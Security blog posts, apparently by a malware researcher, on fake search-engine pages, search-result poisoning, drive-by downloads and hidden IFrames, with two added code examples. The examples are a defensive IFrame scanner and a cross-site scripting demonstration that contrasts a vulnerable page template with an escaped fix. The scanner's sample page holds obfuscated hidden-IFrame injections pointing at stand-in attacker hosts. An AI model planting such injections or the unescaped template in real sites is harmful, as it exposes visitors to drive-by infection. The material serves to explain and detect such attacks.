Beware of search engine helpers
You may come across some sites that offer online searches in cool formats. For example, we found this Italian website that does a search in both Google and Yahoo!.

It works well and presents the results in two different window panes:

However, digging into the source code for that page, we found an infamous drive-by download (loader.exe) that happens to be nothing less than a Trojan Downloader.

That Trojan will download additional malware (dialer, password stealer) onto your computer.
As a general rule, it is safer to use your search engine directly from its main site (i.e. google.com). Many sites offer a search box on their own page that claims to query the major search engines. However, the results returned are often biased, or even worse, come bundled with malicious programs.
JSegura
Google poisoning and impersonations
When we look for something on the Internet, most of us will think of using Google’s search engine. In fact, for a lot of people, the Internet starts with a Google search. Google quickly surpassed its competitors and has established itself as the reference for online search.
With a mission of presenting the best results as quickly as possible comes a certain responsibility. Indeed, we, as Internet users, trust Google to guide us to links that are safe and match our search query. That same trust we have when we see the Google logo can easily be used by hackers to design Google templates that look like the original, but are in fact dangerous websites.
Should we blame the giant search engine if we land on a malicious page that infects our PC after clicking on one of the links? Legally, we may not, but if this situation happened too often, we might get fed up and start using another search engine.
There has been a lot of talk recently in the media about Google poisoning. Basically, hackers hijack Google’s search results so that their malicious sites appear in the top ten results. Hackers create tens of thousands of sites specially crafted for Search Engine Optimization which somehow find their way onto the first results page.

Figure 1: malicious page appears on Google. Thousands of those pages can be created in a matter of minutes to flood the other legitimate sites.
To give the search engine credit, Google is trying to remove those links as soon as it can. It also flags a lot of sites as dangerous and prevents you from directly visiting them. Stopbadware.org has done a lot of work on listing dangerous sites and gives webmasters explanations and tips.
Lastly, Google is not the only victim of search results poisoning. Microsoft’s Live Search has had its fair share too.

Figure 2: a warning from Google: “This site may harm your computer”
The other problem, although this time totally out of the hands of search engines, is lookalike sites. This paper will not talk about the larger problem that is phishing, whose main goal is to capture sensitive information (username/password, credit card number etc.) by using social engineering and other technical subterfuges.

Figure 3: Real Google page

Figure 4: Fake Google page
Let’s take a closer look at the fake Google webpage. There are several areas that have been changed. Although visually it looks pretty close to the original, the source code clearly shows the work of a hacker. An obfuscated JavaScript will try to launch an exploit. Also, as if that were not enough, an add-on is required to do the ‘Google’ search properly. The add-on is actually a Worm that will infest the PC and propagate to other machines.
The icing on the cake (at least for us malware researchers) is the redirection to the AdultFriendFinder website, when clicking on the Sign in link. Normally, this takes you to a page where you put your username and password to log into your Google account. Instead, you will land on an adult site.

Figure 5: Source code for the Fake Google page. Notice the part that says “secret code”… This is obfuscated JavaScript that hides malicious code.

Figure 6: Social engineering trick to download and execute a Worm.

Figure 7: The Sign in link actually redirects you to AdultFriendFinder.com

Figure 8: AdultFriendFinder.com sponsored by a pretty dubious affiliate
It is no big surprise that hackers target Google. Millions of Internet users depend on the search engine every day for their work or personal research. There is also a lot of money involved in Search Engine Optimization (SEO) because businesses heavily rely on being listed by Google. So many tricks have been used (and certainly will keep on being used) to increase a site’s ranking. Better ranking means better traffic, which translates into sales.
Well, hackers are getting really good at SEO, and it opens the door to millions of potential victims. The hackers can then contact the Adware / Rogue companies and make a deal to deliver their products through their ‘sales channels’. It is certainly a bad practice, but again, having a good conscience is not very high on their priority list.
Jerome Segura
The hidden part of the web
The Internet has many facets which are difficult to quickly summarize, but for the most part, people associate it with email, online shopping, blogs, multi-player games and so on…
All those activities are brought to us by a web browser which renders the code used to build each webpage. We rarely ever get to look at what is behind a page. Whether a site is using Java, Flash or is just a plain HTML document, it doesn’t really matter to us. What we care about is that it looks good and is easy to navigate.
Sometimes an apparently legitimate site will trigger an explosion of pop-ups or bring our computer to a crawl for no apparent reason. The problem is, we didn’t really see what happened because it was done behind our backs.
In this paper we will go deep into the core of a webpage and expose the dangerous code responsible for infecting PCs.
A common expression used by security researchers is ‘drive-by download’. In a nutshell, it means that a download happens without the user’s knowledge. Another popular notion is ‘exploit’, which is a piece of code or commands that take advantage of a bug or vulnerability in an application or Operating System with the intent to gain control of the machine.
Although a drive-by download is usually triggered by the user’s actions, the user neither intends nor wants it. Also, the sequence of actions that follows a drive-by download can be carried out silently and stealthily to avoid the user’s awareness.
We will focus on browsing the web, as the main vector for drive-by downloads to occur. As mentioned earlier, web pages consist of lines of code that are interpreted by the web browser (Internet Explorer, Firefox). Most of the time, the code used is totally legitimate and actually makes the web page more user friendly and gives it many different functionalities. For example, some code will be able to determine what browser the user has, what the screen resolution is, etc. Therefore webpages run code not only on their server side, but also locally on the client side, which is the user’s PC.
IFrames
An Iframe is an HTML element that enables an HTML document to be embedded within an already existing one. Iframes are often used to insert ads within a webpage. To put it more simply, it is what Picture-in-Picture is to the TV. The dimensions of the Iframe can be set manually, which is an important point to mention. Hackers use Iframes as a way to embed a malicious website into a legitimate one.
Because hackers do not want users, or even better the webmaster, to notice them, they usually set the size to 0 for both width and height.

Figure 1: Two IFrames are inserted into the source code of the webpage.
JavaScript Obfuscation
Although Iframes are difficult to spot, malware authors want to make sure they are not detected by search engines and other security tools. One way of doing this is to write a piece of code containing an Iframe and obfuscate it so that it is not easily readable.
A lot of webmasters will actually legitimately use JavaScript code to protect the copyright of their website’s source code.
Unfortunately, the browser will decode and execute the code regardless of its intent.

Figure 2: Obfuscated Javascript hides a malicious URL
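The two tricks described above, zero-size IFrames and an IFrame hidden inside obfuscated JavaScript, can both be caught with a small static scanner. The following is an added example written for this article, not code from the original post: it peels off the two obfuscation layers most often seen in such scripts (`unescape("%3C...")` and `String.fromCharCode(60,105,...)`), then reports every IFrame whose width or height is 0 or 1 pixel, or that is hidden by CSS. The sample page, its script blocks and all of the hostnames in it are constructed for the example.

```javascript
// Added example (not from the original post): static scanner for hidden IFrames,
// including ones written into the page by obfuscated JavaScript.

// JavaScript's unescape(): %uXXXX and %XX sequences back to characters.
function jsUnescape(s) {
  return s
    .replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Replace unescape("...") and String.fromCharCode(n,n,...) calls with the text they produce,
// so that markup hidden in script blocks becomes visible to the tag scanner below.
function deobfuscate(source) {
  return source
    .replace(/unescape\(\s*(['"])(.*?)\1\s*\)/g, (_, q, body) => jsUnescape(body))
    .replace(/String\.fromCharCode\(\s*([\d\s,]+)\)/g, (_, list) =>
      list.split(',').map(n => String.fromCharCode(parseInt(n.trim(), 10))).join(''));
}

// Scan (de-obfuscated) HTML for IFrames that a visitor would not be able to see.
// Returns one finding per suspicious frame: its src and the reasons it was flagged.
function findHiddenIframes(html) {
  const decoded = deobfuscate(html);
  const findings = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  const attrRe = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = tagRe.exec(decoded)) !== null) {
    const attrs = {};
    let a;
    while ((a = attrRe.exec(m[1])) !== null) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    }
    const reasons = [];
    const tiny = v => v !== undefined && parseInt(v, 10) <= 1;   // 0x0 or 1x1 pixel frames
    if (tiny(attrs.width) || tiny(attrs.height)) reasons.push('zero-size');
    if (/display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs.style || '')) {
      reasons.push('hidden-by-style');
    }
    if (reasons.length) findings.push({ src: attrs.src || '', reasons });
  }
  return findings;
}

// Constructed sample page: one legitimate ad frame, one plain 0x0 frame, and two
// frames written by obfuscated scripts (unescape and String.fromCharCode).
const SAMPLE_PAGE = `
<html><body>
<h1>Welcome to my page</h1>
<iframe src="https://ads.example.com/banner" width="300" height="250"></iframe>
<iframe src="http://bad.example.invalid/x.php" width="0" height="0" frameborder="0"></iframe>
<script>
document.write(unescape("%3Ciframe src=%22http://evil.example.invalid/in.cgi%22 width=0 height=0%3E%3C/iframe%3E"));
</script>
<script>
document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,99,46,101,120,97,109,112,108,101,47,34,32,119,105,100,116,104,61,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62));
</script>
</body></html>`;

console.log(JSON.stringify(findHiddenIframes(SAMPLE_PAGE), null, 2));
```

The scanner is deliberately regex-based so it can be run over raw page source (or a proxy log) without a browser; a real deployment would also decode nested layers (an `unescape` inside an `eval`) and compare the `src` hosts against the site's own domain, since a zero-size frame pointing at a third party is the pattern the post describes.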
Other JavaScript malicious code
JavaScript enables a malware author to run malicious code on the victim’s computer. One example of this security problem is called cross-site scripting. It happens when an attacker can force a legitimate site to include a malicious script in the page presented to the current victim. (Note that the same legitimate website accessed by a different person on another computer is totally legitimate, which is different from a permanent Iframe infection that affects everyone accessing the site).
For example, if a user logs into his online banking website and at the same time opens up another webpage, that second page can load malicious code and take control of the banking website.

Figure 3: poorly written malicious JavaScript
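The cross-site scripting case above comes down to a legitimate site echoing untrusted input into its page without escaping it. Below is an added example, not code from the original post, showing a hypothetical search-results page in its vulnerable form next to the fixed form that escapes the input on output; the page templates, the `escapeHtml` helper and the sample query are all constructed for illustration.

```javascript
// Added example (not from the original post): a reflected cross-site scripting bug
// in a hypothetical search-results page, beside the escaped version that fixes it.

// Vulnerable: the query string is pasted straight into the HTML, so a query that
// contains markup becomes part of the page and runs with the site's privileges.
function renderResultsVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Escape the characters that let text break out of HTML text or attribute context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// Hardened: the same page, with the untrusted value escaped at the point of output.
function renderResultsSafe(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// Crude detector: the template itself never emits a script element, so any <script
// in the rendered page must have come from the input.
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Constructed sample query: harmless, but it demonstrates that markup in the
// input reaches the page unchanged in the vulnerable version only.
const CONSTRUCTED_QUERY = '<script>alert(1)</script>';

console.log('vulnerable page has script:', containsInjectedScript(renderResultsVulnerable(CONSTRUCTED_QUERY)));
console.log('hardened page has script:  ', containsInjectedScript(renderResultsSafe(CONSTRUCTED_QUERY)));
console.log(renderResultsSafe(CONSTRUCTED_QUERY));
```

Output escaping is the fix for this class of bug; the script-tag check is only a demonstration, since real injected code rarely arrives as a plain `<script>` element.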
Pure exploits
Exploits, also known as attacks, take advantage of software vulnerabilities. As alarming as that sounds, there are many known exploits still unpatched by Microsoft or other software companies. Blackhat hackers are constantly looking for new ways to find a bug in common software or Operating Systems. Some exploits are released in the wild (out there on the Internet) before anybody has a fix for them. They are called ‘zero day exploits’.
Although we can patch our PCs for older exploits, we are still vulnerable to the zero-day ones.
Types of exploits include memory overflow, SQL injection, and other types of code injections.

Figure 4: a malicious DLL file caused an exception in Internet Explorer 7
As we saw, malware authors are using all sorts of techniques to distribute their malicious code. It’s not always in their interest to make it visible to the user. For example, credit card or password stealing Trojans rely on being stealthy and undetected.
There are many hot debates on which browser is most secure. After all, the browser is your gateway to the Internet. There is however a general consensus that Internet Explorer is one of the most unsafe browsers. Because it is the default browser on Windows machines, it is heavily targeted by hackers. But vulnerabilities are not unique to Microsoft products, and concern everybody. Firefox, often praised as the most secure browser, has had its share and periodically patches itself up.
This is just a reminder that the online safety battle is far from being over.
Jerome Segura